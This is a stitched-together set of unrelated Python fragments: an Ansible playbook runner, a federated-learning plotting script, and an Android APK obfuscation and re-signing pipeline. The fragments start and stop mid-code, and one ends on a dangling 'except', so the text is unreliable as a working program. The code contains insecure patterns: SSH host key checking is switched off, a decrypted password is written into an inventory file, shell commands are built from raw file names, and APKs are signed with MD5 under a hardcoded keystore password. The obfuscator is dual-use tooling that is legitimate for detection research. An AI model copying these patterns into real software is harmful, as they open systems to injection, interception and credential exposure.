return {"failure": str(e)}
@staticmethod
def script_session():
try:
""" this function returns a run playbook session """
# the run playbook session is a hash value from the run date and time
s = datetime.datetime.isoformat(datetime.datetime.now()).encode()
return hashlib.sha1(s).hexdigest()
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:script_session")
print(e)
return {"failure": str(e)}
def prepare_ansible_backend_env(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_backend_env")
self.ansible_session_dir = os.path.join(
self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["inventory"]["location"],
self.script_realm
)
os.makedirs(self.ansible_session_dir, exist_ok=True)
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_backend_env")
print(err)
return {"failure": str(err)}
def prepare_ansible_playbook(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_playbook")
self.ansible_playbook_file = os.path.join(
self.ansible_session_dir,
self.script_filename
)
with open(self.ansible_playbook_file, 'w+') as pbf:
pbf.write(self.script_content)
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_playbook")
print(err)
return {"failure": str(err)}
def make_ansible_inventory_data(self, node_name):
""" this function returns true if the inventory file is successfully created else false """
# this function write the ansible inventory for the ongoing session
# as defined in ansible recommendation. it writes ansible inventory group between [] with
# the session id name composed of nodes identities such as ip, fqdn or hostnames.
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:make_ansible_inventory_data")
with open(self.ansible_inventory_file, 'w') as inventory:
crypto = self.realm_settings["hits"]["hits"][0]["_source"]["crypto"]
ansible_user = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["username"]
ansible_password = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["password"]
ansible_certificate = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["certificate"]
# write the ansible inventory group, named after the session id,
# to tag the nodes targeted by this session.
inventory.write('[' + self.ansible_session_id + ']\n')
# node_name holds the network-reachable identities (ip, fqdn or hostname)
# of the nodes targeted by this session; write one per line.
for hostname in node_name:
inventory.write(hostname + '\n')
inventory.write('\n')
inventory.write('[' + self.ansible_session_id + ':vars]\n')
inventory.write('ansible_ssh_common_args=\'-o StrictHostKeyChecking=no\'\n')
inventory.write('ansible_user=' + ansible_user + '\n')
if ansible_password != "":
inventory.write(
str('ansible_password=' + decrypt_password(crypto, ansible_password) + '\n'))
elif ansible_certificate != "":
inventory.write(str(' ansible_ssh_private_key_file=' + ansible_certificate + '\n'))
else:
pass
return True
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:make_ansible_inventory_data")
print(err)
return {"failure": str(err)}
def prepare_ansible_backend_inventory(self, node_name):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_backend_inventory")
""" this function returns true if the file is created else false """
self.ansible_inventory_file = os.path.join(self.ansible_session_dir, self.ansible_session_id)
os.mknod(self.ansible_inventory_file)
return True if self.make_ansible_inventory_data(node_name) else False
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_backend_inventory")
print(err)
return {"failure": str(err)}
def prepare_ansible_backend(self, node_name: list):
self.ansible_session_id = self.script_session()
self.prepare_ansible_backend_env()
self.prepare_ansible_playbook()
self.prepare_ansible_backend_inventory(node_name)
def run_ansible_script(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:run_ansible_script")
node_name = []
for node_data in self.node_details(self.script_realm, self.node_id)["hits"]["hits"]:
if node_data["_source"]["scan_by_ip"]:
node_name.append(node_data["_source"]["ip_reference"])
else:
node_name.append(node_data["_source"]["name"])
self.prepare_ansible_backend(node_name)
ansible_cmd = ["ansible-playbook", "-i", self.ansible_inventory_file, self.ansible_playbook_file]
with subprocess.Popen(ansible_cmd, stdout=subprocess.PIPE) as proc:
while proc.poll() is None:
self.script_report["output"] = self.script_report["output"] + str(proc.stdout.read().decode('UTF-8'))
self.__update_script_report()
time.sleep(0.5)
self.__close_script_report()
return True
except
# from tff import NUM_EPOCHS
from matplotlib import pyplot as plt
import json, ast
import math
import numpy as np
import pickle
import argparse
import pandas as pd
import seaborn as sns
import collections
import tensorflow_federated as tff
from tensorflow.python.framework.constant_op import constant
NUM_CLIENTS = [5,34,338,1692]
NUM_ROUNDS = 150
NUM_EPOCHS = 5
MODES = ['reduction_functions', 'femnist_distribution', 'uniform_vs_num_clients_weighting', 'accuracy_10percent_vs_50percent_clients_comparison', 'accuracy_5_34_338_comparison', 'reduction_functions_comparison','updates_comparison']
modes = ["constant","exponential","linear","sigmoid","reciprocal"]
num_rounds = np.arange(1,NUM_ROUNDS+1)
num_clients = str(NUM_CLIENTS[0])
# def movingaverage(interval, window_size):
# # window = np.ones(int(window_size))/float(window_size)
# # return np.convolve(interval, window, 'same')
# cumsum_vec = np.cumsum(np.insert(interval, 0, 0))
# ma_vec = (cumsum_vec[window_size:] - cumsum_vec[:-window_size]) / window_size
# return ma_vec
##############################################################################################################################################################
################################# Plot the graph of functions for different modes of reducing sampled clients ################################################
##############################################################################################################################################################
def reduction_functions():
#**********************plot constant function***********************#
x = np.arange(0,150,0.1)
y_constant = [338]*len(x)
plt.plot(x,y_constant,label="constant")
#**********************plot exponential function***********************#
y_exponential = [-np.exp((x_head-1)/10.3)+338 for x_head in x if x_head < 60] + [34]*(len(x)-600)
plt.plot(x,y_exponential,label="exponential reduction")
#**********************plot linear function***********************#
y_linear = [-5.065*x_head+338 for x_head in x if x_head < 60] + [34]*(len(x)-600)
plt.plot(x,y_linear,label="linear reduction")
#**********************plot sigmoid function***********************#
y_sigmoid = -304/(1+np.exp(-0.26*(x-20)))+338
plt.plot(x,y_sigmoid,label="sigmoid reduction")
#**********************plot reciprocal function***********************#
y_reciprocal = 50/x+34
plt.plot(x,y_reciprocal,label="reciprocal reduction")
plt.xlim(0,150)
plt.ylim(0,400)
plt.xlabel("Round")
plt.ylabel("Number of clients / Round")
plt.legend()
# plt.title("Reduction functions")
plt.show()
return
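# A minimal sketch (not part of the original code) of how the curves plotted
# above can be turned into a clients-per-round schedule; the constants mirror
# the 338 -> 34 transition drawn above and are illustrative only.
import math
def clients_for_round(round_idx, mode="linear", start=338, floor=34):
    if mode == "constant":
        return start
    if mode == "linear":
        return max(floor, int(start - 5.065 * round_idx))
    if mode == "exponential":
        return max(floor, int(start - math.exp((round_idx - 1) / 10.3)))
    if mode == "sigmoid":
        return int(start - (start - floor) / (1 + math.exp(-0.26 * (round_idx - 20))))
    if mode == "reciprocal":
        return floor + int(50 / max(round_idx, 1))
    raise ValueError("unknown mode: {}".format(mode))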
##############################################################################################################################################################
############################################## Plot the graph of functions for FEMNIST distribution ##########################################################
##############################################################################################################################################################
def femnist_distribution():
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()
client_data_counted_list=[len(emnist_train.create_tf_dataset_for_client(emnist_train.client_ids[x])) for x in range(len(emnist_train.client_ids))] # a list of the number of examples held by each client, indexed like client_ids
## A dictionary with unique elements from the sequence as keys and their frequencies (counts) as values, in this case key=data count of a client & value=number of clients who have the same data count
counted_client_data = collections.Counter(client_data_counted_list)
## Sort counted_client_data by keys in ascending order and store them in a list of tuples, where each tuple has a (key,value)
counted_client_data_sorted = sorted(counted_client_data.items())
# print(counted_client_data_sorted)
## Unzip
data_count_per_client,num_clients=zip(*counted_client_data_sorted) #zip(*) is the inverse of zip(), unpack the list of tuples(pairs) into two tuples, namely (keys) and (values)
#alternatively
# data_count_per_client,num_clients= dict(counted_client_data_sorted).keys(),dict(counted_client_data_sorted).values()
#-----------------Plot the bar plot of the distribution of clients data---------------------##
plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':100})
fig, ax = plt.subplots()
ax.bar(data_count_per_client,num_clients)
ax.set_xlabel('Data amount per client(digits)')
ax.set_ylabel('Frequency(Number of clients)')
# ax.set_title('Data_Distribution_FEMNIST')
plt.show()
return
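# A minimal, standalone sketch of the counting step above: Counter turns the
# per-client example counts into a {count: number_of_clients} histogram, and
# sorting its items yields the x/y pairs used for the bar plot.
import collections
_per_client_counts = [10, 12, 10, 15, 12, 12]      # illustrative values only
_hist = sorted(collections.Counter(_per_client_counts).items())
_xs, _ys = zip(*_hist)
assert _xs == (10, 12, 15) and _ys == (2, 3, 1)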
##############################################################################################################################################################
#################################################### Plot for different weightings strategies ################################################################
##############################################################################################################################################################
def uniform_vs_num_clients_weighting():
with open(f"metrics/num_examples_vs_uniform/{NUM_CLIENTS[1]}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
# plot global accuracy & loss for all training rounds
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[1]} clients, weighted by NUM_EXAMPLES")
# num_rounds_av = movingaverage(num_rounds, 4)
# plt.plot(num_rounds_av, global_accuracy[:147])
with open(f"metrics/num_examples_vs_uniform/{NUM_CLIENTS[1]}_clients_uniform_weights_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[1]} clients, weighted by UNIFORM")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
##############################################################################################################################################################
########################################### Plot for the training accuracy of randomly selected 338&1692 clients #############################################
##############################################################################################################################################################
def accuracy_10percent_vs_50percent_clients_comparison():
for i, n in enumerate(NUM_CLIENTS[2:]):
with open(f"metrics/{n}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{n} random clients")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
##############################################################################################################################################################
########################################### Plot for the training accuracy of randomly selected 5&34&338 clients #############################################
##############################################################################################################################################################
def accuracy_5_34_338_comparison():
for n in range(len(NUM_CLIENTS[:-1])):
with open(f"metrics/{NUM_CLIENTS[n]}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[n]} random clients")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
#####################################################################################################################
################ Plot accuracy for various modes of varying num of randomly selected/sampled clients#################
#####################################################################################################################
def reduction_functions_comparison(modes):
for mode_index, mode in enumerate(modes):
if mode == "constant":
continue
else:
with open(f"metrics/vary_num_clients_and_rounds/{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[-2]} clients_constant_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(np.arange(len(global_accuracy)), [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[-2]} clients, constant")
with open(f"metrics/vary_num_clients_and_rounds/{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[1]} clients_{mode}_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(np.arange(len(global_accuracy)), [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[1]} clients, {mode} reduction")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
###############################################################################################################################
#### Plot the bar graph of model update percentage & training time of different modes & rounds of reducing sampled clients ####
###############################################################################################################################
def updates_comparison():
#*****************************************************************************************************************#
#**********************plot bar chart of pushed_model_updates in different modes**********************************#
#*****************************************************************************************************************#
with open(f"metrics/vary_num_clients_and_rounds/pushed_model_updates.json","r") as f:
pushed_model_updates = json.load(f)
modes = [mode for mode, _ in pushed_model_updates.items()]
updates = [update for _, update in pushed_model_updates.items()]
with open(f"metrics/vary_num_clients_and_rounds/modes_stopped_round.json","r") as f:
modes_stopped_round = json.load(f)
modes_stopped_round = [value for key,value in modes_stopped_round.items()]
data = {"modes": modes,
"updates": updates}
df = pd.DataFrame(data, columns=['modes', 'updates'])
# plt.figure(figsize=(5, 5),dpi=300)
plots = sns.barplot(x="modes", y="updates", data=df)
# Iterating over the bars one-by-one
for bar in plots.patches:
# Using Matplotlib's annotate function and
# passing the coordinates where the annotation shall be done
plots.annotate(format(bar.get_height(), '.2f'), #two decimal for pushed_model_updates_percentage
(bar.get_x() + bar.get_width() / 2,
bar.get_height()), ha='center', va='center',
size=12, xytext=(0, 5),
textcoords='offset points')
# Setting the title for the graph
# plt.title("Model updates comparison")
# plt.ylabel("Total Updates",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
plt.ylabel("Total Updates (updates/round)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# Finally showing the plot
plt.show()
#*****************************************************************************************************************#
#**********************plot bar chart of averaged pushed_model_updates in different modes*************************#
#*****************************************************************************************************************#
# with open(f"metrics/vary_num_clients_and_rounds/pushed_model_updates.json","r") as f:
# pushed_model_updates = json.load(f)
# modes = [mode for mode, _ in pushed_model_updates.items()]
# updates = [update for _, update in pushed_model_updates.items()]
# with open(f"metrics/vary_num_clients_and_rounds/modes_stopped_round.json","r") as f:
# modes_stopped_round = json.load(f)
# modes_stopped_round = [value for key,value in modes_stopped_round.items()]
# average_updates = [update/stopped_round for update,stopped_round in zip(updates,modes_stopped_round)]
# data = {"modes": modes,
# "average_updates": average_updates}
# df = pd.DataFrame(data, columns=['modes', 'average_updates'])
# # plt.figure(figsize=(5, 5),dpi=300)
# plots = sns.barplot(x="modes", y="average_updates", data=df)
# # Iterating over the bars one-by-one
# for bar in plots.patches:
# # Using Matplotlib's annotate function and
# # passing the coordinates where the annotation shall be done
# # plots.annotate(format(bar.get_height(), '.2f'), #two decimal for pushed_model_updates_percentage
# plots.annotate(format(int(bar.get_height())), #integer for pushed_model_updates_percentage
# (bar.get_x() + bar.get_width() / 2,
# bar.get_height()), ha='center', va='center',
# size=12, xytext=(0, 5),
# textcoords='offset points')
# # Setting the title for the graph
# # plt.title("Model updates comparison")
# # plt.ylabel("Total Updates",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.ylabel("Average Updates (updates/round)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# # Finally showing the plot
# plt.show()
#*****************************************************************************************************************#
#**********************plot bar chart of pushed_model_updates_percentage in different modes***********************#
#*****************************************************************************************************************#
# with open(f"metrics/vary_num_clients/pushed_model_updates_percentage.txt","rb") as fp: #unpickling
# pushed_model_updates_percentage = pickle.load(fp)
# modes = [mode for mode, _ in pushed_model_updates_percentage.items()]
# update_percentages = [update_percentage for _, update_percentage in pushed_model_updates_percentage.items()]
# data = {"modes": modes,
# "update_percentages": update_percentages}
# df = pd.DataFrame(data, columns=['modes', 'update_percentages'])
# # plt.figure(figsize=(5, 5),dpi=300)
# plots = sns.barplot(x="modes", y="update_percentages", data=df)
# # Iterating over the bars one-by-one
# for bar in plots.patches:
# # Using Matplotlib's annotate function and
# # passing the coordinates where the annotation shall be done
# plots.annotate(format(bar.get_height(), '.2f'),
# (bar.get_x() + bar.get_width() / 2,
# bar.get_height()), ha='center', va='center',
# size=12, xytext=(0, 5),
# textcoords='offset points')
# # Setting the title for the graph
# plt.title("Model updates comparison")
# plt.ylabel("Model updates(%)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# # Finally showing the plot
# plt.show()
# #****************************************************************************************************************#
# #**********************plot bar chart of training time in different modes - varied clients***********************#
# #****************************************************************************************************************#
# f = open(f"metrics/vary_num_clients/modes_training_time.json", 'r')
# modes_training_time = json.load(f)
# f.close()
# modes = [mode for mode, _ in modes_training_time.items()]
# training_times = [training_time for _, training_time in modes_training_time.items()]
# # plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':300})
# fig, ax = plt.subplots()
# ax.bar(modes,training_times,color=['green', 'red', 'purple', 'blue', 'navy'])
# ax.set_xlabel('Reduction mode',fontweight="bold")
# ax.set_ylabel('Training time(s)',fontweight="bold")
# ax.set_title('Training time comparison')
# label = ["{:.2f}".format(t) for _,t in enumerate(training_times)]
# for rect, label in zip(ax.patches, label):
# height = rect.get_height()
# ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label,
# ha='center', va='bottom')
# plt.show()
#**************************************************************************************************************************#
#**********************plot bar chart of training time in different modes -varied clients and rounds***********************#
#**************************************************************************************************************************#
f = open(f"metrics/vary_num_clients_and_rounds/modes_training_time.json", 'r')
modes_training_time = json.load(f)
f.close()
modes = [mode for mode, _ in modes_training_time.items()]
training_times = [training_time for _, training_time in modes_training_time.items()]
# plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':300})
fig, ax = plt.subplots()
ax.bar(modes,training_times,color=['green', 'red', 'purple', 'blue', 'navy'])
ax.set_xlabel('Reduction mode',fontweight="bold")
ax.set_ylabel('Training time(s)',fontweight="bold")
# ax.set_title('Training time comparison')
label = ["{:.2f}".format(t) for _,t in enumerate(training_times)]
for rect, label in zip(ax.patches, label):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label,
ha='center', va='bottom')
plt.show()
#******************************************************parsing the command line arguments********************************************************************#
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('mode', nargs=1, type=str, help='Running mode. Must be one of the following modes: {}'.format(MODES))
args = parser.parse_args()
mode = args.mode[0]
return args, mode
if __name__ == '__main__':
args, mode = parse_args()
#! /usr/bin/env python
import logging
import sys
import os
from datetime import datetime
import subprocess as sub
import util as u
import exception as e
import obfuscator_rebuild
import obfuscator_defunct
import obfuscator_renaming
import obfuscator_goto
import obfuscator_string
import obfuscator_indirections
import obfuscator_nop
import obfuscator_debug
import obfuscator_branch
import obfuscator_reordering
import obfuscator_reflection
import obfuscator_fields
import obfuscator_manifest
import obfuscator_resource
import obfuscator_raw
import obfuscator_restring
import obfuscator_asset
import obfuscator_intercept
import obfuscator_lib
base_dir = os.path.abspath(os.path.dirname(__file__))
obfuscator_resource_dir = os.path.join(base_dir, 'obfuscators')
obfuscator_log_file = os.path.join(base_dir, 'obfuscators.log')
debug = False
cleanup = True
enable_logging = True
def popen(com_str):
p = sub.Popen(com_str, shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
out, err = p.communicate()
if enable_logging:
u.logger(out)
u.logger(err)
if 'Exception' in out or 'Exception' in err:
if 'method index is too large' in out or 'method index is too large' in err:
raise e.AndroidLimitException('Unable run :' + com_str)
elif 'java.lang.ArrayIndexOutOfBoundsException' in out or 'java.lang.ArrayIndexOutOfBoundsException' in err:
raise e.AndroidRandomException('Unable run :' + com_str)
else:
raise e.RunningObfuscatorException('Unable run :' + com_str)
def clean_temp(sample_tf_dir): # Clear the temporary support directory
try:
if enable_logging:
u.logger('Directory cleaned: ' + sample_tf_dir)
popen('rm -rf ' + sample_tf_dir + '/app')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to clean ' + sample_tf_dir)
def backsmali(sample_tf_dir, sample_file_name): # Backsmali an apk file
try:
if enable_logging:
u.logger('Backsmali: ' + sample_file_name + ' into ' + sample_tf_dir)
popen('apktool d --force --no-debug-info ' + sample_file_name + ' ' + sample_tf_dir + '/app')
if os.path.isdir(u.base_dir()+'/smali/com'):
u.main_exec_dir = 'com'
elif os.path.isdir(u.base_dir()+'/smali/org'):
u.main_exec_dir = 'org'
else:
u.main_exec_dir = ''
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to backsmali ' + sample_file_name + ' into ' + sample_tf_dir)
def smali(sample_tf_dir, sample_file_name): # Smali an apk file
try:
if enable_logging:
u.logger('Smali: ' + sample_file_name + ' from ' + sample_tf_dir)
popen('apktool b --force-all ' + sample_tf_dir + '/app' + ' ' + sample_file_name)
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to smali ' + sample_file_name + ' from ' + sample_tf_dir)
def sign_apk(sample_file_name): # Sign an apk file with a SHA1 key
try:
if enable_logging:
u.logger('Sign: ' + sample_file_name)
popen('jarsigner -sigalg MD5withRSA -digestalg SHA1 -keystore ' + obfuscator_resource_dir + '/resignKey.keystore -storepass resignKey ' + sample_file_name + ' resignKey')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to sign ' + sample_file_name)
def zip_align(sample_file_name): # Align the file
try:
if enable_logging:
u.logger('Zip: ' + sample_file_name)
popen('cp ' + sample_file_name + ' ' + sample_file_name + '_old.apk')
popen('zipalign -f 8 ' + sample_file_name + '_old.apk' + ' ' + sample_file_name)
popen('rm -f ' + sample_file_name + '_old.apk')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to zipalign ' + sample_file_name)
def design_apk(sample_file_name): # Remove a signature from an apk file
try:
if enable_logging:
u.logger('DeSign: ' + sample_file_name)
popen('zip -d ' + sample_file_name + ' /META-INF/*') # Delete the META-INF folder from the apk root
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to delete META-INF from ' + sample_file_name)
def init(sample_tf_dir): # Initialize the obfuscator routine
reload(sys)
sys.setdefaultencoding('utf-8')
u.obfuscator_dir = obfuscator_resource_dir
u.global_dir = sample_tf_dir + '/app'
logging.basicConfig(filename=obfuscator_log_file, level=logging.DEBUG)
if enable_logging:
u.logger('Obfuscators Initialize: ' + u.obfuscator_dir + ' ' + u.global_dir)
def apply_resign(sample_file_name): # Resign an apk file
try:
design_apk(sample_file_name)
sign_apk(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex))
def apply_zip(sample_file_name): # Zipalign an apk file
try:
zip_align(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex))
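# A minimal sketch (illustrative; the real orchestration lives in the caller)
# of one plausible ordering of the helpers above for a single sample:
# decode with apktool, let an obfuscator rewrite the smali in place, rebuild,
# re-sign and zipalign the result.
def repackage(sample_file_name, sample_tf_dir, obfuscator_module):
    backsmali(sample_tf_dir, sample_file_name)   # apktool d into <tmp>/app
    obfuscator_module.obfuscate()                # e.g. obfuscator_nop
    smali(sample_tf_dir, sample_file_name)       # apktool b back into the apk
    apply_resign(sample_file_name)               # strip META-INF + jarsigner
    apply_zip(sample_file_name)                  # zipalign the final package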
def apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscatorPy):
'''Apply an obfuscator'''
try:
if enable_logging:
u.logger('Python Obfuscator!')
#backsmali(sample_tf_dir, sample_file_name)
obfuscatorPy.obfuscate()
if debug:
smali(sample_tf_dir, sample_file_name)
#sign_apk(sample_file_name)
#clean_temp(sample_tf_dir)
except (e.OpenToolException, e.LoadFileException) as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable run python obfuscator')
def run_obfuscator_resigned(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Resign')
apply_resign(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Resign')
def run_obfuscator_zip(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Align')
apply_zip(sample_file_name)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Align')
def run_obfuscator_rebuild(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Rebuild')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_rebuild)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Rebuild')
def run_obfuscator_defunct(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Defunct')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_defunct)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Defunct')
def run_obfuscator_renaming(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Renaming')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_renaming)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Renaming')
def run_obfuscator_goto(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Goto')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_goto)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Goto')
def run_obfuscator_string(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator String')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_string)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply String')
def run_obfuscator_indirections(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Indirections')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_indirections)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Indirections')
def run_obfuscator_nop(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Nop')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_nop)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Nop')
def run_obfuscator_debug(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Debug')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_debug)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Debug')
def run_obfuscator_branch(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Branch')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_branch)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Branch')
def run_obfuscator_reordering(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Reordering')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_reordering)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Reordering')
def run_obfuscator_reflection(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Reflection')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_reflection)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Reflection')
def run_obfuscator_fields(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Field')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_fields)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Fields')
def run_obfuscator_manifest(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Manifest')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_manifest)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Manifest')
def run_obfuscator_resource(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Resource')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_resource)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Resource')
def run_obfuscator_raw(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Raw')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_raw)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Raw')
def run_obfuscator_restring(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Restring')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_restring)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Restring')
def run_obfuscator_asset(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Asset')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_asset)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Asset')
def run_obfuscator_intercept(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Intercept')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_intercept)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Intercept')
def run_obfuscator_lib(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Lib')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_lib)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Lib')
#The obfuscator DB Name to Method mapping
obfuscator_mapping = {
'Resigned': run_obfuscator_resigned,
'Alignment': run_obfuscator_zip,
'Rebuild': run_obfuscator_rebuild,
'Defunct': run_obfuscator_defunct,
'Renaming': run_obfuscator_renaming,
'Goto': run_obfuscator_goto,
'StringEncrypt': run_obfuscator_string,
'Indirections': run_obfuscator_indirections,
'Nop': run_obfuscator_nop,
'Debug': run_obfuscator_debug,
